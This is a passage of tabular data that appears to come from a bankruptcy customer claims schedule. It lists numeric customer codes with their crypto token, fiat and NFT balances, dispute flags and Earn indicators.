| 07321736 | | BTC[.00591195], DOGE[2.36107383], ETH[.02305054], ETHW[.02276326], LTC[18.28700066], TRX[2], USD[0.22], USDT[0.00000043] | Yes | |
| 07321737 | | DOGE[0], SOL[9.81308461], TRX[0], USD[0.00] | | |
| 07321739 | | DOGE[0], USD[0.00] | | |
| 07321740 | | CUSDT[3], DOGE[4.02205712], USD[0.00] | Yes | |
| 07321741 | | BRZ[2], CUSDT[2042.97462765], DOGE[1117.00548795], TRX[235.04919113], USD[0.74], USDT[1] | | |
| 07321743 | | BTC[.00040175], DOGE[363.45671952], ETH[.01175422], ETHW[.01160374], SOL[5.58793839], USD[0.00] | Yes | |
| 07321745 | | USD[10.00] | | |
| 07321746 | | BRZ[1], USD[0.00] | Yes | |
| 07321748 | | USD[0.98] | | |
| 07321750 | | USD[10.00] | | |
| 07321752 | | USD[0.00] | | |
| 07321756 | | USD[10.00] | | |
| 07321759 | | CUSDT[11], DOGE[3012.21646161], ETH[.09761981], ETHW[0.09761981], LINK[1.19705004], SOL[2.21828682], TRX[8], UNI[1.52226313], USD[0.00], USDT[0] | | |
| 07321762 | | BTC[0], DOGE[15.03923246], ETH[0], TRX[0], USD[0.00] | | |
| 07321763 | | USD[10.00] | | |
| 07321765 | | USD[10.00] | | |
| 07321766 | | BTC[0], DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07321767 | | BCH[.11082758], BRZ[0.00000007], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[423.29369818], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[39.76], USDT[0.00000002] | Yes | |
| 07321768 | | CUSDT[1], DOGE[0], ETH[.0002295], ETHW[.0002295], USD[6.31] | | |
| 07321771 | | USD[10.00] | | |
| 07321774 | | CUSDT[1], USD[0.01] | | |
| 07321775 | | BTC[.00000024], DOGE[2], ETH[0.00000115], ETHW[0.12513915], SHIB[2], USD[0.47] | Yes | |
| 07321776 | | USD[10.00] | | |
| 07321777 | | USD[10.00] | | |
| 07321778 | | BTC[0], DOGE[0] | | |
| 07321780 | | USD[10.00] | | |
| 07321782 | | USD[10.00] | | |
| 07321784 | | USD[10.00] | | |
| 07321786 | | USD[0.00] | | |
| 07321787 | | BTC[0], DOGE[1568.09160939], USD[0.01] | | |
| 07321788 | | USD[10.00] | | |
| 07321789 | | AAVE[.64275787], BAT[4.30733836], BF_POINT[300], BRZ[1], CUSDT[18], DOGE[14.72837517], ETH[.06244797], ETHW[.06167171], GRT[103.25245048], LINK[7.42778797], MATIC[148.69725528], SHIB[.00000001], SOL[1.07416974], SUSHI[10.18568479], TRX[12.01540556], UNI[9.071168532], USD[0.00], USDT[2.153054] | Yes | |
| 07321792 | | BRZ[3], CUSDT[5], DOGE[233.01400791], USD[0.00] | | |
| 07321793 | | TRX[187.8550578], USD[0.00] | | |
| 07321794 | | UNI[0], USD[14.32] | | |
| 07321795 | | BTC[.00016214], USD[0.00] | | |
| 07321796 | | DOGE[0], ETH[.00000001], LTC[0] | | |
| 07321797 | | DOGE[.0003775], TRX[.00045937], USD[0.11], USDT[0.00000001] | | |
| 07321798 | | USD[10.00] | | |
| 07321799 | | CUSDT[1], DOGE[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321800 | | USD[10.00] | | |
| 07321802 | | USD[10.00] | | |
| 07321803 | | BAT[2.05328169], BCH[0], BRZ[1], CUSDT[3], DOGE[0], GRT[1], NFT (29727521297281229/ALPHA-RONIN #335)[1], NFT (56078765694840318/Belugie #7361)[1], SOL[0.02343024], USD[0.00], USDT[0] | Yes | |
| 07321806 | | USD[10.00] | | |
| 07321807 | | AVAX[27.54399018], BRZ[3], BTC[.2591178], DOGE[2147.88659291], ETH[8.61926011], ETHW[3.43894112], MATIC[2941.49857091], SHIB[6], SOL[40.00726416], TRX[2], USD[0.00] | Yes | |
| 07321809 | | USD[10.00] | | |
| 07321810 | | BRZ[1], CUSDT[10], DOGE[178.24988094], ETH[.00460347], ETHW[.00460347], GRT[11.21421346], TRX[2], USD[0.00] | | |
| 07321811 | | BRZ[1], BTC[0], CUSDT[6], SUSHI[0], USD[0.01] | | |
| 07321813 | | BAT[1], CUSDT[1], DOGE[5346.81747794], USD[0.00] | | |
| 07321814 | | USD[10.00] | | |
| 07321816 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0.98407005], ETH[0], TRX[4], USD[0.00] | | |
| 07321817 | | USD[10.00] | | |
| 07321820 | | TRX[2], USD[10.95] | Yes | |
| 07321821 | | CUSDT[2369.46795987], DOGE[1432.20517898], SOL[5.53791604], TRX[2434.2068716], USD[82.06] | | |
| 07321822 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07321823 | | USD[10.00] | | |
| 07321824 | | USD[10.00] | | |
| 07321826 | | USD[10.00] | | |
| 07321827 | | CUSDT[2], DOGE[2042.50543877], NFT (31982793032201721/Space Bums #6148)[1], NFT (47078110477646912/SOLYETIS #1411)[1], NFT (55710650821857496/Space Bums #5995)[1], SHIB[5445283.68171438], SOL[.43642426], USD[0.02], USDT[1] | | |
| 07321828 | | USD[0.00] | | |
| 07321829 | | DOGE[1288.31162581], USD[0.00] | | |
| 07321830 | | USD[10.76] | Yes | |
| 07321832 | | BRZ[1], CUSDT[3], DOGE[1], USD[0.01] | | |
| 07321833 | | USD[10.00] | | |
| 07321834 | | USD[10.00] | | |
| 07321836 | | USD[10.00] | | |
| 07321837 | | USD[10.00] | | |
| 07321839 | | USD[10.00] | | |
| 07321840 | | USD[10.00] | | |
| 07321841 | | USD[10.00] | | |
| 07321842 | | USD[10.00] | | |
| 07321843 | | BRZ[1], BTC[.00065992], CUSDT[5], DOGE[48.17042104], GRT[63.30242721], MATIC[33.86172714], SOL[1.13359256], TRX[2], USD[0.34] | | |
| 07321844 | | CUSDT[4], SOL[4.30718399], USD[0.00] | Yes | |
| 07321845 | | BRZ[0], BTC[0], DOGE[0], NFT (348846614716639555/FTX - Off The Grid Miami #1453)[1], SHIB[2], USD[0.00] | Yes | |
| 07321846 | | USD[10.00] | | |
| 07321851 | | BAT[1], BRZ[1], CUSDT[11], DOGE[0.33461884], SOL[.02221175], TRX[1], USD[0.00] | | |
| 07321852 | | DOGE[1], USD[0.00] | | |
| 07321853 | | USD[10.00] | | |
| 07321857 | | USD[10.00] | | |
| 07321858 | | DOGE[1], SUSHI[.00985297], USD[11.05] | Yes | |
| 07321859 | | BAT[1], BRZ[1], CUSDT[3], DOGE[1], TRX[4], USD[0.01] | | |
| 07321861 | | DOGE[1.04757507], USD[0.00] | | |
| 07321862 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07321863 | | USD[10.00] | | |
| 07321864 | | USD[10.00] | | |
| 07321866 | | BAT[.00017633], BTC[0], CUSDT[1], ETH[0], ETHW[0], GRT[0], LTC[.00005075], NFT (516977519101655832/Retro-Future-Bitcoin \| F-T-X #2 Edition #3)[1], SHIB[74], TRX[0], USD[184.92], USDT[0.00000001] | Yes | |
| 07321867 | | BTC[0], ETH[0], USD[0.00] | | |
| 07321870 | | CUSDT[1], DOGE[4047.13592606], USD[0.00], USDT[1] | | |
| 07321873 | | USD[10.00] | | |
| 07321874 | | BRZ[1], CUSDT[2], GRT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07321876 | | CUSDT[1], DOGE[210.67461309], USD[1.04] | | |
| 07321877 | | BF_POINT[200], CUSDT[10], MATIC[.00018267], SOL[.0000023], USD[0.00] | Yes | |
| 07321878 | | CUSDT[2], DOGE[143.04730651], LTC[.0009266], SUSHI[0.09803427], TRX[.391575], USD[0.82] | | |
| 07321879 | | USD[10.00] | | |
| 07321881 | | DOGE[.02867269], USD[0.00] | | |
| 07321882 | | BAT[.0626722], ETH[.00007466], ETHW[0], USD[0.20], USDT[0.00000001], YFI[0] | Yes | |
| 07321885 | | BTC[.00004183], ETH[0.00000152], MATIC[0], USD[0.23] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321886 | | DOGE[2161.81393483], TRX[1], USD[10.00] | | |
| 07321887 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07321890 | | USD[10.00] | | |
| 07321892 | | DOGE[.22020666], USD[0.02] | | |
| 07321893 | | USD[10.00] | | |
| 07321894 | | USD[0.00] | | |
| 07321895 | | DOGE[1456.79148321], USD[0.46] | | |
| 07321896 | | USD[10.00] | | |
| 07321897 | Contingent, Disputed | BTC[0], DOGE[0], NFT (522133512238256107/Lorenz #1444)[1], SOL[.015], USD[0.01], USDT[0] | | |
| 07321901 | | USD[10.00] | | |
| 07321904 | | DOGE[63953.213], USD[0.03] | | |
| 07321908 | | BF_POINT[300], USD[0.00] | | |
| 07321909 | | USD[10.00] | | |
| 07321913 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07321914 | | BTC[.00008839], CUSDT[1], DOGE[137.32392639], ETH[.00440551], ETHW[.00440551], TRX[1], USD[25.01], USDT[4.97253366] | | |
| 07321916 | | BTC[.1560493], USD[0.00] | | |
| 07321919 | | CUSDT[1], GRT[4.00108964], NFT (289545311392964022/Meow)[1], NFT (349575021564576924/Attitude Adjustment)[1], NFT (369870951462000356/Dragon Head)[1], NFT (503644937185442354/Man best friend)[1], NFT (572163200705888197/Deer Skull)[1], SOL[.21951254], USD[5.32] | Yes | |
| 07321920 | | USD[10.00] | | |
| 07321923 | | USD[0.00] | | |
| 07321924 | | USD[10.00] | | |
| 07321926 | | USD[10.00] | | |
| 07321931 | | BAT[1], BRZ[1], BTC[0], CUSDT[1], TRX[3], USD[0.00] | | |
| 07321933 | | USD[10.00] | | |
| 07321934 | | USD[10.00] | | |
| 07321936 | | BTC[.00036598], CUSDT[1], DOGE[460.32331478], NFT (475804370646472036/Coachella x FTX Weekend 2 #10156)[1], USD[0.00] | Yes | |
| 07321938 | | BRZ[1], CUSDT[7], DOGE[343.53842079], ETH[.00000117], ETHW[.00000117], GRT[1.00313735], SHIB[1], SOL[.00007919], TRX[3], UNI[2.59278582], USD[0.01], USDT[34.71127325] | Yes | |
| 07321941 | | BTC[.00000894], TRX[.85], USD[1.00], USDT[0.07592748] | | |
| 07321943 | | USD[10.00] | | |
| 07321945 | | USD[0.08], USDT[0] | | |
| 07321946 | | USD[10.00] | | |
| 07321947 | | USD[10.00] | | |
| 07321948 | | USD[10.00] | | |
| 07321950 | | USD[10.00] | | |
| 07321952 | | TRX[1], USD[10.00] | | |
| 07321953 | | ETH[.0005412], ETHW[.0005412], UNI[.00000001], USD[35.14], USDT[0.00000001] | | |
| 07321960 | | BTC[0.00001203], ETH[0.00083449], ETHW[0], USD[50000.00] | | |
| 07321961 | | BTC[.0010408], CUSDT[2], DOGE[1710.97063301], TRX[1], USD[0.00] | | |
| 07321962 | | USD[10.00] | | |
| 07321964 | | BTC[.00016791], CUSDT[1165.56676965], DOGE[75.81158776], USD[0.19], USDT[0] | | |
| 07321965 | | USD[10.00] | | |
| 07321968 | | USD[0.00] | | |
| 07321970 | | USD[10.30] | Yes | |
| 07321973 | | BAT[75.44967536], BRZ[3.00082002], BTC[.01896435], CUSDT[589.59414813], DOGE[2], ETH[.36658298], ETHW[.36658298], GRT[174.72817124], KSHIB[2325.41735898], TRX[1666.62444162], USD[1943.36], USDT[1] | | |
| 07321974 | | USD[10.00] | | |
| 07321977 | | DOGE[183.83301225] | | |
| 07321978 | | TRX[177.14669464], USD[0.00] | | |
| 07321980 | | CUSDT[1], DOGE[1.00004908], USD[0.00] | | |
| 07321982 | | BRZ[1], CUSDT[3], DOGE[596.82832888], ETH[.00520671], ETHW[.00520671], LTC[.04199609], TRX[385.59740562], USD[0.00] | | |
| 07321983 | | CUSDT[2], DOGE[92.72744986], ETH[.04265103], ETHW[.04265103], USD[0.51] | | |
| 07321984 | | BTC[.00065521], CUSDT[5], DOGE[20.6097486], ETH[.01226056], ETHW[.01211008], SHIB[249552.47732302], USD[0.00] | Yes | |
| 07321987 | | CUSDT[1], DOGE[3], ETH[1.41998809], ETHW[1.41998809], GRT[2], TRX[1], USD[4.75], USDT[16.45826221] | | |
| 07321988 | | CUSDT[5], DOGE[0], SHIB[5.43416962], USD[0.00] | Yes | |
| 07321991 | | USD[10.00] | | |
| 07321992 | | USD[10.00] | | |
| 07321994 | | USD[10.00] | | |
| 07321995 | | BRZ[1], BTC[.00524641], CUSDT[6], DOGE[3047.70402972], ETH[.01541987], ETHW[.01522835], TRX[3], USD[0.34] | Yes | |
| 07321996 | | DOGE[287.45426088], USD[0.00] | | |
| 07321997 | | DOGE[1], USD[20.19] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07321998 | | BTC[0], CUSDT[7], DOGE[0], ETH[0], SOL[0], TRX[2], USD[0.00], USDT[0.00002779] | | |
| 07322000 | | BTC[0.00000065], DOGE[0.44303643] | | |
| 07322001 | | CUSDT[44.14847741], ETH[.00328254], ETHW[.00328254], USD[0.00] | | |
| 07322002 | | BTC[0.00000067], DOGE[.565], ETH[.00031994], ETHW[0.00031993], LTC[.00314411], USD[2.97] | | |
| 07322004 | | USD[10.00] | | |
| 07322009 | | USD[0.01] | | |
| 07322010 | | USD[10.00] | | |
| 07322012 | | DOGE[32.45800372], USD[0.00] | | |
| 07322013 | | DOGE[.72], USD[0.00] | | |
| 07322014 | | BTC[.01810161], DOGE[3152.46570656], ETH[.41796927], ETHW[.41796927], USD[0.00] | | |
| 07322017 | | USD[10.00] | | |
| 07322018 | | USD[10.00] | | |
| 07322020 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[15], DAI[0], DOGE[0], ETH[0], GRT[0], MKR[.00010024], SOL[0], TRX[0], USD[0.00] | | |
| 07322022 | | USD[10.00] | | |
| 07322025 | | DOGE[1.40496204], USD[0.00] | | |
| 07322028 | | BAT[1], BRZ[2], BTC[.00261851], CUSDT[3], TRX[3], USD[0.01], USDT[1] | | |
| 07322029 | | CUSDT[2], DOGE[1], SUSHI[0.0006031], USD[10.00] | | |
| 07322030 | | CUSDT[1], DOGE[1127.10211513], TRX[1], USD[0.00] | | |
| 07322031 | | USD[10.00] | | |
| 07322032 | | BTC[0.00045428], DOGE[41.0325484], ETH[0.00375367], ETHW[0.00375367], GRT[0], LINK[0], MATIC[5.62293218], USD[0.00] | | |
| 07322034 | | BF_POINT[1100], ETH[0], ETHW[0], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07322036 | | BTC[0], ETHW[.119886], GRT[44.95725], LINK[4.096105], USD[7.14], USDT[0] | | |
| 07322037 | | BRZ[1], CUSDT[7], GRT[1], SHIB[1], TRX[3], USD[0.01] | | |
| 07322041 | | DOGE[1416.45640243], TRX[1], USD[0.00] | | |
| 07322042 | | USD[10.00] | | |
| 07322044 | | BTC[.4829166], ETH[9.376614], ETHW[9.376614], USD[2.64] | | |
| 07322046 | | USD[0.00] | Yes | |
| 07322047 | | DOGE[950.0989654], TRX[1], USD[0.01] | | |
| 07322049 | | BTC[0.05476418], DOGE[486.97541124], ETH[.47342652], ETHW[.4732278], LINK[.00000001], MATIC[63.86737889], NFT (535213475468274979/Barcelona Ticket Stub #984)[1], NFT (537525257403704431/Miami Ticket Stub #272)[1], SHIB[4091431.88050533], SOL[1.06499515], USD[0.00], USDT[0] | Yes | |
| 07322053 | Contingent, Disputed | USD[0.00] | | |
| 07322056 | | DOGE[2589.48000918], USD[0.00] | Yes | |
| 07322057 | | USD[0.00] | | |
| 07322058 | | USD[10.00] | | |
| 07322059 | | USD[10.00] | | |
| 07322060 | | USD[10.00] | | |
| 07322061 | | USD[10.00] | | |
| 07322062 | | BCH[.00025672], BRZ[0.00002648], BTC[.00460424], CUSDT[1], TRX[1], USD[0.00], USDT[0.30300052] | | |
| 07322063 | | USD[0.01] | | |
| 07322064 | | CUSDT[1], DOGE[662.19409234], TRX[1], USD[0.00] | Yes | |
| 07322065 | | SHIB[2751.8326501], USD[0.00], USDT[0.00000001] | Yes | |
| 07322068 | | USD[10.00] | | |
| 07322069 | | USD[0.00] | | |
| 07322071 | | BTC[.00021174], USD[0.00] | | |
| 07322072 | | BTC[0], DOGE[0], GRT[1], LINK[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07322075 | | USD[6.98], USDT[0] | Yes | |
| 07322076 | | USD[7.12] | | |
| 07322080 | | DOGE[7.51683259], ETH[.00621131], ETHW[.00621131], SOL[.42270461], USD[0.00] | | |
| 07322083 | | USD[10.00] | | |
| 07322085 | | USD[10.00] | | |
| 07322088 | | CUSDT[1], USD[0.00] | Yes | |
| 07322089 | | BRZ[1], CUSDT[2], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07322090 | | USD[10.00] | | |
| 07322091 | | USD[10.00] | | |
| 07322093 | | DOGE[21.42681708], USD[0.00] | | |
| 07322096 | | DOGE[11414.51098576], TRX[1], USD[0.00] | | |
| 07322097 | | AAVE[.00005756], BAT[2], BCH[.00001262], BTC[.00193805], CUSDT[167.82500011], DOGE[76.3077753], ETH[.57830153], GRT[1.00570839], LINK[.00202306], NEAR[1.94929414], NFT (301892783810011808/Hard work )[1], NFT (424789317296350541/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #26)[1], NFT (505708636715494935/Founding Frens Lawyer #555)[1], NFT (552525500579741922/Playboy Pinup #1)[1], NFT (569054342901470124/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #37)[1], SHIB[.00000034], SOL[.44487137], TRX[19.44668942], USD[0.23], USDT[4.12338994] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322098 | | USD[0.00] | | |
| 07322099 | | BAT[0], BTC[0], CUSDT[1], DOGE[17.50019832], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[0.09] | | |
| 07322103 | | USD[0.00] | | |
| 07322104 | | CUSDT[15], DOGE[32.03144967], TRX[1745.773717], USD[0.00] | | |
| 07322105 | | DOGE[0.24742085], UNI[0], USD[0.00] | | |
| 07322108 | | USD[10.00] | | |
| 07322109 | | USD[0.00] | | |
| 07322110 | | USD[0.05], USDT[0] | | |
| 07322111 | | USD[10.00] | | |
| 07322112 | | USD[10.00] | | |
| 07322114 | | BCH[0], BF_POINT[100], BRZ[0], BTC[0], CUSDT[0], DOGE[472.64090946], ETH[0], ETHW[0], GRT[0], KSHIB[0], LINK[0], LTC[0], SHIB[2636684.82069387], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07322115 | | USD[10.00] | | |
| 07322116 | | DOGE[7.03370697], USD[0.00] | Yes | |
| 07322118 | | USD[0.01] | | |
| 07322120 | | BRZ[2], CUSDT[5], DOGE[5484.58441245], SHIB[123727509.24326171], SUSHI[1.08609992], TRX[3], UNI[22.16931666], USD[0.04], USDT[1.07786898] | Yes | |
| 07322121 | | WBTC[0.00000853] | Yes | |
| 07322122 | | BRZ[2], CUSDT[11], DOGE[.41096058], TRX[3], USD[0.00] | | |
| 07322123 | | USD[10.00], USDT[0] | | |
| 07322124 | | USD[10.88] | Yes | |
| 07322125 | | USD[10.00] | | |
| 07322127 | | BCH[0], BTC[0], NFT (352938704499427213/2974 Floyd Norman - CLE 4-0112)[1], NFT (489193117882008722/Saudi Arabia Ticket Stub #1393)[1], SOL[0.00000001], TRX[.000009], USD[0.00], USDT[0] | | |
| 07322128 | | BTC[.00023817], DOGE[332.30898608], ETH[.00376735], ETHW[.00376735], KSHIB[400.48261796], SHIB[363641.36363636], TRX[2], USD[0.00] | | |
| 07322129 | | SUSHI[.61522044], TRX[1], USD[0.00] | | |
| 07322130 | | USD[10.00] | | |
| 07322131 | | USD[10.00] | | |
| 07322132 | | ALGO[12.60313783], BAT[0], BCH[0], BTC[0.00204755], CUSDT[1], DOGE[5087.49691491], ETH[0.19980195], ETHW[0.19959083], KSHIB[0], LTC[0], SHIB[8290213.18928413], SOL[.10944195], TRX[0], USD[0.00], USDT[0.00000949] | Yes | |
| 07322134 | | USD[10.00] | | |
| 07322137 | | BRZ[0], USD[0.00] | Yes | |
| 07322138 | | USD[10.00] | | |
| 07322140 | | AUD[0.00], BAT[1.00725027], BRZ[2], CUSDT[3], DOGE[12.63612616], ETH[0], ETHW[0], MATIC[0], SOL[0], TRX[7], UNI[1.0927587], USD[9.70], USDT[1.0834574] | Yes | |
| 07322142 | | USD[10.00] | | |
| 07322145 | | ETH[0], USD[0.00] | | |
| 07322147 | | CUSDT[2], DOGE[.00013533], USD[0.00] | | |
| 07322149 | | DOGE[1], USD[0.00] | | |
| 07322153 | | USD[10.00] | | |
| 07322154 | | USD[10.00] | | |
| 07322155 | | DOGE[0], ETH[0], GRT[0], SUSHI[0], UNI[0], USD[0.15], YFI[0] | | |
| 07322156 | | USD[10.00] | | |
| 07322160 | | BAT[1.86121104], BTC[.00026525], DOGE[112.71105212], SUSHI[1.07554589], USD[0.00] | | |
| 07322164 | | BRZ[2], CUSDT[1], DOGE[30511.31294972], TRX[60.64721426], USD[0.00] | | |
| 07322167 | | USD[10.00] | | |
| 07322169 | | BAT[0], BRZ[0], DAI[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07322172 | | BAT[16.42246289], BRZ[1], BTC[.00008888], CUSDT[3], DOGE[403.46486499], ETH[.0558518], ETHW[.0558518], SOL[1.01641842], SUSHI[.90636737], TRX[1], USD[0.00] | | |
| 07322173 | | BRZ[1], BTC[.00574491], CUSDT[4696.25025744], DOGE[12979.70544104], ETH[1.57152636], ETHW[1.57152636], LINK[5.49432286], TRX[2104.81706288], USD[0.00], YFI[.00451439] | | |
| 07322174 | | CUSDT[1], DOGE[105], USD[0.00] | | |
| 07322176 | | BTC[0.05250230], DOGE[0], SOL[4.79545108], USD[0.00] | | |
| 07322177 | | DOGE[1], USD[216.46] | Yes | |
| 07322178 | | BTC[0], DOGE[0], ETH[0.26443783], ETHW[0.26443783], EUR[0.00], USD[0.00] | | |
| 07322179 | | USD[10.00] | | |
| 07322181 | | USD[10.00] | | |
| 07322182 | | USD[0.01] | | |
| 07322183 | | BAT[1], BRZ[1], DOGE[1], ETH[.00004021], ETHW[0], NFT (534228263757963583/Imola Ticket Stub #2244)[1], TRX[1], UNI[.00000753], USD[0.00], USDT[0] | Yes | |
| 07322186 | | USD[10.00] | | |
| 07322187 | | BTC[.00003891], DAI[.05117229], DOGE[0], ETH[.00000001], TRX[.600053], USD[4.78], USDT[0] | | |
| 07322190 | | DOGE[0], USD[0.00] | Yes | |
| 07322191 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07322192 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322193 | | USD[0.00], USDT[8.44526102] | Yes | |
| 07322195 | | USD[10.00] | | |
| 07322196 | | USD[10.00] | | |
| 07322197 | | MATIC[133.10667715], SHIB[18453088.16279995], SOL[1.07157471], USD[0.00] | Yes | |
| 07322198 | | CUSDT[13], DOGE[368.82259674], ETH[.02871343], ETHW[.02871343], TRX[3], USD[0.00] | | |
| 07322199 | | CUSDT[3], TRX[2], USD[0.00] | | |
| 07322201 | | CUSDT[2], DOGE[0], USD[0.00] | Yes | |
| 07322203 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07322204 | | BRZ[0], BTC[0.01355899], DOGE[6736.09844463], USD[0.00], USDT[0] | Yes | |
| 07322205 | | ETH[.03568574], ETHW[.03568573], GRT[4.94826627], SHIB[1970397.24731296], USD[0.01] | | |
| 07322206 | | USD[10.00] | | |
| 07322207 | | DOGE[325.30871441], ETH[0.00000001], ETHW[0], LTC[0], USD[0.00] | | |
| 07322208 | | USD[10.00] | | |
| 07322210 | | CUSDT[4], DOGE[17.09744111], TRX[32.31076597], USD[0.12] | | |
| 07322211 | | USD[11.03] | Yes | |
| 07322212 | | USD[10.00] | | |
| 07322213 | | USD[0.19] | | |
| 07322216 | | USD[10.00] | | |
| 07322217 | | BAT[14.76389035], DOGE[2], USD[0.00] | Yes | |
| 07322220 | | USD[10.00] | | |
| 07322221 | | DOGE[0] | | |
| 07322223 | | BTC[.06160069], DOGE[4], ETH[7.16287745], ETHW[6.71722467], GRT[0], LINK[.00015636], MATIC[1.00117515], SHIB[7], TRX[1], USD[0.00], USDT[1.00258049] | Yes | |
| 07322224 | | BTC[0], DOGE[2], ETH[0], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07322225 | | DOGE[1907.5844], USD[0.02] | | |
| 07322227 | | BTC[.0000177], DOGE[.325], TRX[.789], USD[0.00] | | |
| 07322228 | | USD[10.00] | | |
| 07322234 | | USD[10.00] | | |
| 07322235 | | DOGE[160.91120124], USD[0.00] | Yes | |
| 07322237 | | USD[10.00] | | |
| 07322238 | | USD[10.00] | | |
| 07322241 | | USD[10.00] | | |
| 07322242 | | USD[20.00] | | |
| 07322243 | | USD[10.00] | | |
| 07322244 | | BRZ[1], CUSDT[3], SOL[3.01567600], TRX[1], USD[0.00] | | |
| 07322245 | | USD[10.00] | | |
| 07322246 | | BTC[.0016932], DOGE[.228], USD[5.52] | | |
| 07322249 | | BRZ[3], CUSDT[3], DOGE[0], USD[0.00], USDT[0] | | |
| 07322251 | | USD[10.00] | | |
| 07322253 | | CUSDT[2], USD[0.00] | | |
| 07322257 | | USD[0.01] | | |
| 07322259 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[2.00489256], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], LINK[0.78863143], LTC[.0000012], NFT[319926693689959354/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #53][1], NFT[341073346494079590/Infinity #5][1], NFT[373283233603053333/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #51][1], NFT[412370206623618551/West coast piers ][1], NFT[436797786888260869/Paranormal Set #3][1], NFT[453388994504957926/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #50][1], NFT[485594462753729997/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #42][1], NFT[499653145703571027/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #80][1], SHIB[5.06458638], TRX[.00344107], USD[0.00], USDT[1.04428571] | Yes | |
| 07322260 | | USD[10.00] | | |
| 07322261 | | SOL[.65173639], USD[0.00] | | |
| 07322262 | | USD[10.00] | | |
| 07322264 | | USD[10.00] | | |
| 07322265 | | BRZ[4], BTC[.00000873], CUSDT[31], DOGE[3.00013412], ETHW[3.46933367], GRT[.0000875], LINK[.0000362], MATIC[131.39492615], SHIB[6], TRX[9.00012006], UNI[.00009286], USD[0.01], USDT[1.05867584] | Yes | |
| 07322266 | | NFT[520501647758862476/Imola Ticket Stub #2358][1], USD[0.89] | | |
| 07322267 | | BRZ[1], CUSDT[3], DOGE[334.3276155], TRX[1], USD[0.00] | | |
| 07322268 | | CUSDT[1], DOGE[247.16057472], USD[0.00] | | |
| 07322269 | | USD[19.30] | | |
| 07322270 | | BCH[0], BTC[0.00000016], DOGE[0], LINK[0], LTC[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07322273 | | GRT[4.8110068], USD[0.00] | Yes | |
| 07322274 | | CUSDT[1], ETH[.00000001], ETHW[0], TRX[3], USD[0.00] | | |
| 07322275 | | CUSDT[3], ETHW[.17968077], GRT[1.00367791], TRX[1], USD[0.00] | Yes | |
| 07322276 | | USD[10.00] | | |
| 07322277 | | USD[11.06] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322280 | | DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07322281 | | BAT[.894], BTC[.00004], DOGE[.4], ETH[0], SOL[.00000001], USD[0.70], USDT[0] | | |
| 07322282 | Contingent, Disputed | BTC[0.00018182], USD[0.00], USDT[0] | | |
| 07322283 | | USD[10.00] | | |
| 07322284 | | USD[10.00] | | |
| 07322286 | | BTC[0], DOGE[0.18040384], ETH[0], USD[1985.06], USDT[1.00049325] | Yes | |
| 07322288 | | USD[10.00] | | |
| 07322290 | | USD[10.00] | | |
| 07322292 | | USD[10.00] | | |
| 07322295 | | USD[10.00] | | |
| 07322296 | | USD[10.00] | | |
| 07322298 | | USD[8.76] | | |
| 07322301 | | DOGE[0], USD[0.00] | | |
| 07322305 | | USD[10.00] | | |
| 07322306 | | CUSDT[4], SOL[0.38918501], USD[0.00] | Yes | |
| 07322310 | | CUSDT[2], DOGE[1], TRX[0], USD[0.00] | | |
| 07322311 | | BTC[.00249897], DOGE[1], ETH[.03340436], ETHW[.03299374], TRX[1], USD[1.14], USDT[0] | Yes | |
| 07322312 | | DOGE[1.00004313], USD[0.00] | | |
| 07322313 | | BTC[.00175239], DOGE[336], ETH[.012], ETHW[.012], LINK[2], SOL[.12], USD[0.01] | | |
| 07322314 | Contingent, Disputed | USD[0.00] | | |
| 07322315 | | USD[10.00] | | |
| 07322316 | | USD[10.00] | | |
| 07322317 | | USD[10.00] | | |
